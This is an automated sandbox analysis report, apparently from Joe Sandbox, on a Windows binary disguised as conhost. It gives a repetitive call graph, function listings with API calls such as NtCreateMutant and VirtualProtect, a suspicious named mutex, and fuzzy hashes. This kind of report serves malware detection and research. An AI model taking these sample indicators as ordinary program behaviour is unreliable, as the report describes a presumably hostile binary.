2385->2386 2387 140001599 2386->2387 2388 140001394 2 API calls 2387->2388 2389 1400015a8 2388->2389 2390 140001394 2 API calls 2389->2390 2391 1400015b7 2390->2391 2392 140001394 2 API calls 2391->2392 2393 1400015c6 2392->2393 2394 140001394 2 API calls 2393->2394 2395 1400015d5 2394->2395 2396 140001394 2 API calls 2395->2396 2397 1400015e4 2396->2397 2398 140001394 2 API calls 2397->2398 2399 1400015f3 2398->2399 2399->2194 2401 140001394 2 API calls 2400->2401 2402 14000147c 2401->2402 2403 140001394 2 API calls 2402->2403 2404 14000148b 2403->2404 2405 140001394 2 API calls 2404->2405 2406 14000149a 2405->2406 2407 140001394 2 API calls 2406->2407 2408 1400014a9 2407->2408 2409 140001394 2 API calls 2408->2409 2410 1400014b8 2409->2410 2411 140001394 2 API calls 2410->2411 2412 1400014c7 2411->2412 2413 140001394 2 API calls 2412->2413 2414 1400014d6 2413->2414 2415 1400014e5 2414->2415 2416 140001394 2 API calls 2414->2416 2417 140001394 2 API calls 2415->2417 2416->2415 2418 1400014ef 2417->2418 2419 1400014f4 2418->2419 2420 140001394 2 API calls 2418->2420 2421 140001394 2 API calls 2419->2421 2420->2419 2422 1400014fe 2421->2422 2423 140001503 2422->2423 2424 140001394 2 API calls 2422->2424 2425 140001394 2 API calls 2423->2425 2424->2423 2426 14000150d 2425->2426 2427 140001394 2 API calls 2426->2427 2428 140001512 2427->2428 2429 140001394 2 API calls 2428->2429 2430 140001521 2429->2430 2431 140001394 2 API calls 2430->2431 2432 140001530 2431->2432 2433 140001394 2 API calls 2432->2433 2434 14000153f 2433->2434 2435 140001394 2 API calls 2434->2435 2436 14000154e 2435->2436 2437 140001394 2 API calls 2436->2437 2438 14000155d 2437->2438 2439 140001394 2 API calls 2438->2439 2440 14000156c 2439->2440 2441 140001394 2 API calls 2440->2441 2442 14000157b 2441->2442 2443 140001394 2 API calls 2442->2443 2444 14000158a 2443->2444 2445 140001394 2 API calls 2444->2445 2446 140001599 2445->2446 2447 140001394 2 API calls 2446->2447 2448 1400015a8 2447->2448 2449 140001394 2 API calls 2448->2449 2450 1400015b7 2449->2450 2451 140001394 2 API calls 2450->2451 2452 1400015c6 2451->2452 2453 140001394 2 API calls 2452->2453 2454 1400015d5 2453->2454 2455 140001394 2 API calls 2454->2455 2456 1400015e4 2455->2456 2457 140001394 2 API calls 2456->2457 2458 1400015f3 2457->2458 2458->2231 2459 140001530 2458->2459 2460 140001394 2 API calls 2459->2460 2461 14000153f 2460->2461 2462 140001394 2 API calls 2461->2462 2463 14000154e 2462->2463 2464 140001394 2 API calls 2463->2464 2465 14000155d 2464->2465 2466 140001394 2 API calls 2465->2466 2467 14000156c 2466->2467 2468 140001394 2 API calls 2467->2468 2469 14000157b 2468->2469 2470 140001394 2 API calls 2469->2470 2471 14000158a 2470->2471 2472 140001394 2 API calls 2471->2472 2473 140001599 2472->2473 2474 140001394 2 API calls 2473->2474 2475 1400015a8 2474->2475 2476 140001394 2 API calls 2475->2476 2477 1400015b7 2476->2477 2478 140001394 2 API calls 2477->2478 2479 1400015c6 2478->2479 2480 140001394 2 API calls 2479->2480 2481 1400015d5 2480->2481 2482 140001394 2 API calls 2481->2482 2483 1400015e4 2482->2483 2484 140001394 2 API calls 2483->2484 2485 1400015f3 2484->2485 2485->2222 2485->2223 2487 140001394 2 API calls 2486->2487 2488 1400014b8 2487->2488 2489 140001394 2 API calls 2488->2489 2490 1400014c7 2489->2490 2491 140001394 2 API calls 2490->2491 2492 1400014d6 2491->2492 2493 1400014e5 2492->2493 2494 140001394 2 API calls 2492->2494 2495 140001394 2 API calls 2493->2495 2494->2493 2496 1400014ef 2495->2496 2497 1400014f4 2496->2497 2498 140001394 2 API calls 2496->2498 2499 140001394 2 API calls 2497->2499 2498->2497 2500 1400014fe 2499->2500 2501 140001503 2500->2501 2502 140001394 2 API calls 2500->2502 2503 140001394 2 API calls 2501->2503 2502->2501 2504 14000150d 2503->2504 2505 140001394 2 API calls 2504->2505 2506 140001512 2505->2506 2507 140001394 2 API calls 2506->2507 2508 140001521 2507->2508 2509 140001394 2 API calls 2508->2509 2510 140001530 2509->2510 2511 140001394 2 API calls 2510->2511 2512 14000153f 2511->2512 2513 140001394 2 API calls 2512->2513 2514 14000154e 2513->2514 2515 140001394 2 API calls 2514->2515 2516 14000155d 2515->2516 2517 140001394 2 API calls 2516->2517 2518 14000156c 2517->2518 2519 140001394 2 API calls 2518->2519 2520 14000157b 2519->2520 2521 140001394 2 API calls 2520->2521 2522 14000158a 2521->2522 2523 140001394 2 API calls 2522->2523 2524 140001599 2523->2524 2525 140001394 2 API calls 2524->2525 2526 1400015a8 2525->2526 2527 140001394 2 API calls 2526->2527 2528 1400015b7 2527->2528 2529 140001394 2 API calls 2528->2529 2530 1400015c6 2529->2530 2531 140001394 2 API calls 2530->2531 2532 1400015d5 2531->2532 2533 140001394 2 API calls 2532->2533 2534 1400015e4 2533->2534 2535 140001394 2 API calls 2534->2535 2536 1400015f3 2535->2536 2536->2227 2537 140001440 2536->2537 2538 140001394 2 API calls 2537->2538 2539 14000144f 2538->2539 2540 140001394 2 API calls 2539->2540 2541 14000145e 2540->2541 2542 140001394 2 API calls 2541->2542 2543 14000146d 2542->2543 2544 140001394 2 API calls 2543->2544 2545 14000147c 2544->2545 2546 140001394 2 API calls 2545->2546 2547 14000148b 2546->2547 2548 140001394 2 API calls 2547->2548 2549 14000149a 2548->2549 2550 140001394 2 API calls 2549->2550 2551 1400014a9 2550->2551 2552 140001394 2 API calls 2551->2552 2553 1400014b8 2552->2553 2554 140001394 2 API calls 2553->2554 2555 1400014c7 2554->2555 2556 140001394 2 API calls 2555->2556 2557 1400014d6 2556->2557 2558 1400014e5 2557->2558 2559 140001394 2 API calls 2557->2559 2560 140001394 2 API calls 2558->2560 2559->2558 2561 1400014ef 2560->2561 2562 1400014f4 2561->2562 2563 140001394 2 API calls 2561->2563 2564 140001394 2 API calls 2562->2564 2563->2562 2565 1400014fe 2564->2565 2566 140001503 2565->2566 2567 140001394 2 API calls 2565->2567 2568 140001394 2 API calls 2566->2568 2567->2566 2569 14000150d 2568->2569 2570 140001394 2 API calls 2569->2570 2571 140001512 2570->2571 2572 140001394 2 API calls 2571->2572 2573 140001521 2572->2573 2574 140001394 2 API calls 2573->2574 2575 140001530 2574->2575 2576 140001394 2 API calls 2575->2576 2577 14000153f 2576->2577 2578 140001394 2 API calls 2577->2578 2579 14000154e 2578->2579 2580 140001394 2 API calls 2579->2580 2581 14000155d 2580->2581 2582 140001394 2 API calls 2581->2582 2583 14000156c 2582->2583 2584 140001394 2 API calls 2583->2584 2585 14000157b 2584->2585 2586 140001394 2 API calls 2585->2586 2587 14000158a 2586->2587 2588 140001394 2 API calls 2587->2588 2589 140001599 2588->2589 2590 140001394 2 API calls 2589->2590 2591 1400015a8 2590->2591 2592 140001394 2 API calls 2591->2592 2593 1400015b7 2592->2593 2594 140001394 2 API calls 2593->2594 2595 1400015c6 2594->2595 2596 140001394 2 API calls 2595->2596 2597 1400015d5 2596->2597 2598 140001394 2 API calls 2597->2598 2599 1400015e4 2598->2599 2600 140001394 2 API calls 2599->2600 2601 1400015f3 2600->2601 2601->2227 2601->2234 2603 1400014e5 2602->2603 2604 140001394 2 API calls 2602->2604 2605 140001394 2 API calls 2603->2605 2604->2603 2606 1400014ef 2605->2606 2607 1400014f4 2606->2607 2608 140001394 2 API calls 2606->2608 2609 140001394 2 API calls 2607->2609 2608->2607 2610 1400014fe 2609->2610 2611 140001503 2610->2611 2612 140001394 2 API calls 2610->2612 2613 140001394 2 API calls 2611->2613 2612->2611 2614 14000150d 2613->2614 2615 140001394 2 API calls 2614->2615 2616 140001512 2615->2616 2617 140001394 2 API calls 2616->2617 2618 140001521 2617->2618 2619 140001394 2 API calls 2618->2619 2620 140001530 2619->2620 2621 140001394 2 API calls 2620->2621 2622 14000153f 2621->2622 2623 140001394 2 API calls 2622->2623 2624 14000154e 2623->2624 2625 140001394 2 API calls 2624->2625 2626 14000155d 2625->2626 2627 140001394 2 API calls 2626->2627 2628 14000156c 2627->2628 2629 140001394 2 API calls 2628->2629 2630 14000157b 2629->2630 2631 140001394 2 API calls 2630->2631 2632 14000158a 2631->2632 2633 140001394 2 API calls 2632->2633 2634 140001599 2633->2634 2635 140001394 2 API calls 2634->2635 2636 1400015a8 2635->2636 2637 140001394 2 API calls 2636->2637 2638 1400015b7 2637->2638 2639 140001394 2 API calls 2638->2639 2640 1400015c6 2639->2640 2641 140001394 2 API calls 2640->2641 2642 1400015d5 2641->2642 2643 140001394 2 API calls 2642->2643 2644 1400015e4 2643->2644 2645 140001394 2 API calls 2644->2645 2646 1400015f3 2645->2646 2646->2250 2648 140001394 2 API calls 2647->2648 2649 14000158a 2648->2649 2650 140001394 2 API calls 2649->2650 2651 140001599 2650->2651 2652 140001394 2 API calls 2651->2652 2653 1400015a8 2652->2653 2654 140001394 2 API calls 2653->2654 2655 1400015b7 2654->2655 2656 140001394 2 API calls 2655->2656 2657 1400015c6 2656->2657 2658 140001394 2 API calls 2657->2658 2659 1400015d5 2658->2659 2660 140001394 2 API calls 2659->2660 2661 1400015e4 2660->2661 2662 140001394 2 API calls 2661->2662 2663 1400015f3 2662->2663 2663->2250 2665 140001394 2 API calls 2664->2665 2666 1400015b7 2665->2666 2667 140001394 2 API calls 2666->2667 2668 1400015c6 2667->2668 2669 140001394 2 API calls 2668->2669 2670 1400015d5 2669->2670 2671 140001394 2 API calls 2670->2671 2672 1400015e4 2671->2672 2673 140001394 2 API calls 2672->2673 2674 1400015f3 2673->2674 2674->2250 2676 140001394 2 API calls 2675->2676 2677 140001530 2676->2677 2678 140001394 2 API calls 2677->2678 2679 14000153f 2678->2679 2680 140001394 2 API calls 2679->2680 2681 14000154e 2680->2681 2682 140001394 2 API calls 2681->2682 2683 14000155d 2682->2683 2684 140001394 2 API calls 2683->2684 2685 14000156c 2684->2685 2686 140001394 2 API calls 2685->2686 2687 14000157b 2686->2687 2688 140001394 2 API calls 2687->2688 2689 14000158a 2688->2689 2690 140001394 2 API calls 2689->2690 2691 140001599 2690->2691 2692 140001394 2 API calls 2691->2692 2693 1400015a8 2692->2693 2694 140001394 2 API calls 2693->2694 2695 1400015b7 2694->2695 2696 140001394 2 API calls 2695->2696 2697 1400015c6 2696->2697 2698 140001394 2 API calls 2697->2698 2699 1400015d5 2698->2699 2700 140001394 2 API calls 2699->2700 2701 1400015e4 2700->2701 2702 140001394 2 API calls 2701->2702 2703 1400015f3 2702->2703 2703->2250 2705 140001394 2 API calls 2704->2705 2706 140001431 2705->2706 2707 140001394 2 API calls 2706->2707 2708 140001440 2707->2708 2709 140001394 2 API calls 2708->2709 2710 14000144f 2709->2710 2711 140001394 2 API calls 2710->2711 2712 14000145e 2711->2712 2713 140001394 2 API calls 2712->2713 2714 14000146d 2713->2714 2715 140001394 2 API calls 2714->2715 2716 14000147c 2715->2716 2717 140001394 2 API calls 2716->2717 2718 14000148b 2717->2718 2719 140001394 2 API calls 2718->2719 2720 14000149a 2719->2720 2721 140001394 2 API calls 2720->2721 2722 1400014a9 2721->2722 2723 140001394 2 API calls 2722->2723 2724 1400014b8 2723->2724 2725 140001394 2 API calls 2724->2725 2726 1400014c7 2725->2726 2727 140001394 2 API calls 2726->2727 2728 1400014d6 2727->2728 2729 1400014e5 2728->2729 2730 140001394 2 API calls 2728->2730 2731 140001394 2 API calls 2729->2731 2730->2729 2732 1400014ef 2731->2732 2733 1400014f4 2732->2733 2734 140001394 2 API calls 2732->2734 2735 140001394 2 API calls 2733->2735 2734->2733 2736 1400014fe 2735->2736 2737 140001503 2736->2737 2738 140001394 2 API calls 2736->2738 2739 140001394 2 API calls 2737->2739 2738->2737 2740 14000150d 2739->2740 2741 140001394 2 API calls 2740->2741 2742 140001512 2741->2742 2743 140001394 2 API calls 2742->2743 2744 140001521 2743->2744 2745 140001394 2 API calls 2744->2745 2746 140001530 2745->2746 2747 140001394 2 API calls 2746->2747 2748 14000153f 2747->2748 2749 140001394 2 API calls 2748->2749 2750 14000154e 2749->2750 2751 140001394 2 API calls 2750->2751 2752 14000155d 2751->2752 2753 140001394 2 API calls 2752->2753 2754 14000156c 2753->2754 2755 140001394 2 API calls 2754->2755 2756 14000157b 2755->2756 2757 140001394 2 API calls 2756->2757 2758 14000158a 2757->2758 2759 140001394 2 API calls 2758->2759 2760 140001599 2759->2760 2761 140001394 2 API calls 2760->2761 2762 1400015a8 2761->2762 2763 140001394 2 API calls 2762->2763 2764 1400015b7 2763->2764 2765 140001394 2 API calls 2764->2765 2766 1400015c6 2765->2766 2767 140001394 2 API calls 2766->2767 2768 1400015d5 2767->2768 2769 140001394 2 API calls 2768->2769 2770 1400015e4 2769->2770 2771 140001394 2 API calls 2770->2771 2772 1400015f3 2771->2772 2772->2250 2774 140001394 2 API calls 2773->2774 2775 140001440 2774->2775 2776 140001394 2 API calls 2775->2776 2777 14000144f 2776->2777 2778 140001394 2 API calls 2777->2778 2779 14000145e 2778->2779 2780 140001394 2 API calls 2779->2780 2781 14000146d 2780->2781 2782 140001394 2 API calls 2781->2782 2783 14000147c 2782->2783 2784 140001394 2 API calls 2783->2784 2785 14000148b 2784->2785 2786 140001394 2 API calls 2785->2786 2787 14000149a 2786->2787 2788 140001394 2 API calls 2787->2788 2789 1400014a9 2788->2789 2790 140001394 2 API calls 2789->2790 2791 1400014b8 2790->2791 2792 140001394 2 API calls 2791->2792 2793 1400014c7 2792->2793 2794 140001394 2 API calls 2793->2794 2795 1400014d6 2794->2795 2796 1400014e5 2795->2796 2797 140001394 2 API calls 2795->2797 2798 140001394 2 API calls 2796->2798 2797->2796 2799 1400014ef 2798->2799 2800 1400014f4 2799->2800 2801 140001394 2 API calls 2799->2801 2802 140001394 2 API calls 2800->2802 2801->2800 2803 1400014fe 2802->2803 2804 140001503 2803->2804 2805 140001394 2 API calls 2803->2805 2806 140001394 2 API calls 2804->2806 2805->2804 2807 14000150d 2806->2807 2808 140001394 2 API calls 2807->2808 2809 140001512 2808->2809 2810 140001394 2 API calls 2809->2810 2811 140001521 2810->2811 2812 140001394 2 API calls 2811->2812 2813 140001530 2812->2813 2814 140001394 2 API calls 2813->2814 2815 14000153f 2814->2815 2816 140001394 2 API calls 2815->2816 2817 14000154e 2816->2817 2818 140001394 2 API calls 2817->2818 2819 14000155d 2818->2819 2820 140001394 2 API calls 2819->2820 2821 14000156c 2820->2821 2822 140001394 2 API calls 2821->2822 2823 14000157b 2822->2823 2824 140001394 2 API calls 2823->2824 2825 14000158a 2824->2825 2826 140001394 2 API calls 2825->2826 2827 140001599 2826->2827 2828 140001394 2 API calls 2827->2828 2829 1400015a8 2828->2829 2830 140001394 2 API calls 2829->2830 2831 1400015b7 2830->2831 2832 140001394 2 API calls 2831->2832 2833 1400015c6 2832->2833 2834 140001394 2 API calls 2833->2834 2835 1400015d5 2834->2835 2836 140001394 2 API calls 2835->2836 2837 1400015e4 2836->2837 2838 140001394 2 API calls 2837->2838 2839 1400015f3 2838->2839 2839->2250

                                                        Callgraph

                                                        • Executed
                                                        • Not Executed
                                                        • Opacity -> Relevance
                                                        • Disassembly available
                                                        callgraph 0 Function_00000001400056E1 1 Function_0000000140001AE4 34 Function_0000000140001D40 1->34 74 Function_0000000140001BA0 1->74 2 Function_00000001400014E5 70 Function_0000000140001394 2->70 3 Function_00000001400010F0 4 Function_00000001400057F1 5 Function_00000001400030F1 6 Function_00000001400014F4 6->70 7 Function_0000000140001800 65 Function_0000000140002290 7->65 8 Function_0000000140005A00 9 Function_0000000140002F00 56 Function_0000000140001370 9->56 10 Function_0000000140001E00 11 Function_0000000140001000 11->10 41 Function_0000000140001750 11->41 78 Function_0000000140001FB0 11->78 87 Function_0000000140001FC0 11->87 12 Function_0000000140002500 13 Function_0000000140005701 14 Function_0000000140001503 14->70 15 Function_0000000140001404 15->70 16 Function_0000000140002104 17 Function_0000000140005A10 17->8 18 Function_0000000140001E10 19 Function_0000000140003110 20 Function_0000000140005811 21 Function_0000000140001512 21->70 22 Function_0000000140005820 23 Function_0000000140002320 24 Function_0000000140002420 25 Function_0000000140001521 25->70 26 Function_0000000140005721 27 Function_0000000140005921 28 Function_0000000140001422 28->70 29 Function_0000000140001530 29->70 30 Function_0000000140003130 31 Function_0000000140001431 31->70 32 Function_000000014000153F 32->70 33 Function_0000000140001440 33->70 34->65 35 Function_0000000140001140 49 Function_0000000140001160 35->49 36 Function_0000000140005741 37 Function_0000000140005841 38 Function_0000000140005941 39 Function_0000000140001F47 57 Function_0000000140001870 39->57 40 Function_0000000140001650 42 Function_0000000140003150 42->8 42->9 42->14 42->25 42->28 42->29 42->31 42->32 42->33 46 Function_000000014000145E 42->46 48 Function_0000000140002660 42->48 53 Function_000000014000156C 42->53 54 Function_000000014000146D 42->54 42->56 61 Function_000000014000157B 42->61 75 Function_00000001400015A8 42->75 76 Function_00000001400014A9 42->76 85 Function_00000001400016C0 42->85 96 Function_00000001400014D6 42->96 98 Function_00000001400026E0 42->98 43 Function_0000000140002050 44 Function_0000000140003051 45 Function_000000014000155D 45->70 46->70 47 Function_0000000140002460 49->42 49->49 49->57 62 Function_0000000140001880 49->62 64 Function_0000000140001F90 49->64 49->85 50 Function_0000000140001760 99 Function_00000001400020E0 50->99 51 Function_0000000140005761 52 Function_0000000140001E65 52->57 53->70 54->70 55 Function_000000014000216F 58 Function_0000000140001A70 58->34 58->74 59 Function_0000000140003070 60 Function_0000000140005871 61->70 62->24 62->34 62->48 62->74 63 Function_0000000140005981 66 Function_0000000140002590 67 Function_0000000140003090 68 Function_0000000140002691 69 Function_0000000140005791 70->17 86 Function_0000000140005CC0 70->86 71 Function_0000000140002194 71->57 72 Function_000000014000219E 73 Function_0000000140001FA0 74->34 77 Function_00000001400023B0 74->77 90 Function_00000001400024D0 74->90 75->70 76->70 79 Function_00000001400022B0 80 Function_00000001400026B0 81 Function_00000001400030B1 82 Function_00000001400057B1 83 Function_00000001400058B1 84 Function_0000000140001AB3 84->34 84->74 86->8 88 Function_0000000140001AC3 88->34 88->74 89 Function_00000001400014C7 89->70 91 Function_00000001400017D0 92 Function_0000000140001FD0 93 Function_00000001400026D0 94 Function_00000001400057D1 95 Function_0000000140001AD4 95->34 95->74 96->70 97 Function_00000001400022E0 98->2 98->6 98->8 98->14 98->21 98->45 98->46 98->48 98->56 98->76 98->89 100 Function_00000001400017E0 100->99 101 Function_00000001400059E0

                                                        Executed Functions

                                                        Function 0000000140001394 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • NtCreateMutant.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.4570666828.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000024.00000002.4570200332.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000024.00000002.4570711361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000024.00000002.4570736583.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000024.00000002.4570768032.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_36_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID: CreateMutant
                                                        • String ID:
                                                        • API String ID: 2492398971-0
                                                        • Opcode ID: 338254b652d1f69ed292fc4e3228e560f2da0ce6d728233ecdced76f20a0a8d5
                                                        • Instruction ID: 4e445467e272a21999d15bea06999aa8a42ee3ae41e0c55491b319eca22205ce
                                                        • Opcode Fuzzy Hash: 338254b652d1f69ed292fc4e3228e560f2da0ce6d728233ecdced76f20a0a8d5
                                                        • Instruction Fuzzy Hash: B2F09DB2608B408AEA12DB52F89179A77A0F38D7C0F009919BBC853735DB38C190CB40

                                                        Non-executed Functions

                                                        Function 00000001400026E0 Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 376COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 308 1400026e0-14000273b call 140002660 312 140002741-14000274b 308->312 313 14000280e-14000285e call 14000155d 308->313 315 140002774-14000277a 312->315 318 140002953-14000297b call 1400014c7 313->318 319 140002864-140002873 313->319 315->313 317 140002780-140002787 315->317 320 140002789-140002792 317->320 321 140002750-140002752 317->321 336 140002986-1400029c8 call 140001503 call 140005a00 318->336 337 14000297d 318->337 322 140002eb7-140002ef4 call 140001370 319->322 323 140002879-140002888 319->323 326 140002794-1400027ab 320->326 327 1400027f8-1400027fb 320->327 324 14000275a-14000276e 321->324 328 1400028e4-14000294e wcsncmp call 1400014e5 323->328 329 14000288a-1400028dd 323->329 324->313 324->315 332 1400027f5 326->332 333 1400027ad-1400027c2 326->333 327->324 328->318 329->328 332->327 338 1400027d0-1400027d7 333->338 346 140002e49-140002e84 call 140001370 336->346 347 1400029ce-1400029d5 336->347 337->336 339 1400027d9-1400027f3 338->339 340 140002800-140002809 338->340 339->332 339->338 340->324 350 1400029d7-140002a0c 346->350 354 140002e8a 346->354 349 140002a13-140002a43 wcscpy wcscat wcslen 347->349 347->350 352 140002a45-140002a76 wcslen 349->352 353 140002a78-140002aa5 349->353 350->349 355 140002aa8-140002abf wcslen 352->355 353->355 354->349 356 140002ac5-140002ad8 355->356 357 140002e8f-140002eab call 140001370 355->357 359 140002af5-140002dfb wcslen call 1400014a9 * 2 call 1400014f4 call 1400014c7 * 2 call 14000145e * 3 356->359 360 140002ada-140002aee 356->360 357->322 378 140002dfd-140002e1b call 140001512 359->378 379 140002e20-140002e48 call 14000145e 359->379 360->359 378->379
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.4570666828.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000024.00000002.4570200332.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000024.00000002.4570711361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000024.00000002.4570736583.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000024.00000002.4570768032.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_36_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID: wcslen$wcscatwcscpywcsncmp
                                                        • String ID: 0$X$\BaseNamedObjects\tjkmqfhdesvsjfcufdzrlppc$`
                                                        • API String ID: 597572034-1218434000
                                                        • Opcode ID: c6e2e1af014e3208bb83af523ed93f01407971df75aa3d8bd0ede48e4dac1971
                                                        • Instruction ID: 887ae4b9209bec19cb5235481eeaaa4e09af4edbdf33f5227ea0a563a76ab627
                                                        • Opcode Fuzzy Hash: c6e2e1af014e3208bb83af523ed93f01407971df75aa3d8bd0ede48e4dac1971
                                                        • Instruction Fuzzy Hash: CE1248B2618BC081E762CB16F8443EAB7A4F789794F414215EBA957BF5EF78C189C700
                                                        Function 0000000140001160 Relevance: 13.6, APIs: 9, Instructions: 130sleepstringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.4570666828.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000024.00000002.4570200332.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000024.00000002.4570711361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000024.00000002.4570736583.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000024.00000002.4570768032.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_36_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                        • String ID:
                                                        • API String ID: 2643109117-0
                                                        • Opcode ID: cc25f1b0c6b2393d005b809a42414e1e0315373ab1d0073d8fdcdf459b008827
                                                        • Instruction ID: 0e586463d4a4ca50f61cc9045132e744ecc11ae356de15d822631b56ec325e6b
                                                        • Opcode Fuzzy Hash: cc25f1b0c6b2393d005b809a42414e1e0315373ab1d0073d8fdcdf459b008827
                                                        • Instruction Fuzzy Hash: 2E5113B1611A4085FB16EF27F9947EA27A1AB8D7D0F449121FB8E873B2DE38C4958300
                                                        Function 0000000140001BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 424 140001ba0-140001bc0 425 140001bc2-140001bd7 424->425 426 140001c09 424->426 427 140001be9-140001bf1 425->427 428 140001c0c-140001c17 call 1400023b0 426->428 429 140001bf3-140001c02 427->429 430 140001be0-140001be7 427->430 435 140001cf4-140001cfe call 140001d40 428->435 436 140001c1d-140001c6c call 1400024d0 VirtualQuery 428->436 429->430 432 140001c04 429->432 430->427 430->428 434 140001cd7-140001cf3 memcpy 432->434 439 140001d03-140001d1e call 140001d40 435->439 436->439 442 140001c72-140001c79 436->442 443 140001d23-140001d38 GetLastError call 140001d40 439->443 444 140001c7b-140001c7e 442->444 445 140001c8e-140001c97 442->445 449 140001cd1 444->449 450 140001c80-140001c83 444->450 446 140001ca4-140001ccf VirtualProtect 445->446 447 140001c99-140001c9c 445->447 446->443 446->449 447->449 452 140001c9e 447->452 449->434 450->449 451 140001c85-140001c8a 450->451 451->449 454 140001c8c 451->454 452->446 454->452
                                                        APIs
                                                        • VirtualQuery.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                        • VirtualProtect.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                        • memcpy.MSVCRT ref: 0000000140001CE0
                                                        • GetLastError.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.4570666828.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000024.00000002.4570200332.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000024.00000002.4570711361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000024.00000002.4570736583.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000024.00000002.4570768032.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_36_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                        • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                        • API String ID: 2595394609-2123141913
                                                        • Opcode ID: 03d641028e8cbeedac7629b6a89e77fc92f16b8d443fb953fe453dc5cecd47d0
                                                        • Instruction ID: 81f24f74ba40ea54e773ea797397bff52108e8205f0ae1895b42fd95fa22bf35
                                                        • Opcode Fuzzy Hash: 03d641028e8cbeedac7629b6a89e77fc92f16b8d443fb953fe453dc5cecd47d0
                                                        • Instruction Fuzzy Hash: A24143F1601A4586FA26DF47F884BE927A0E78DBC4F594126EF0E877B1DA38C586C700
                                                        Function 0000000140002104 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 455 140002104-14000210b 456 140002111-140002128 EnterCriticalSection 455->456 457 140002218-140002221 455->457 458 14000220b-140002212 LeaveCriticalSection 456->458 459 14000212e-14000213c 456->459 460 140002272-140002280 457->460 461 140002223-14000222d 457->461 458->457 462 14000214d-140002159 TlsGetValue GetLastError 459->462 463 140002241-140002263 DeleteCriticalSection 461->463 464 14000222f 461->464 466 14000215b-14000215e 462->466 467 140002140-140002147 462->467 463->460 465 140002230-14000223f free 464->465 465->463 465->465 466->467 468 140002160-14000216d 466->468 467->458 467->462 468->467
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.4570666828.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000024.00000002.4570200332.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000024.00000002.4570711361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000024.00000002.4570736583.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000024.00000002.4570768032.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_36_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                        • String ID:
                                                        • API String ID: 3326252324-0
                                                        • Opcode ID: 419951eec1e063c074906488a0681e11fdea5c088cbca47dd5ee791b47c177bd
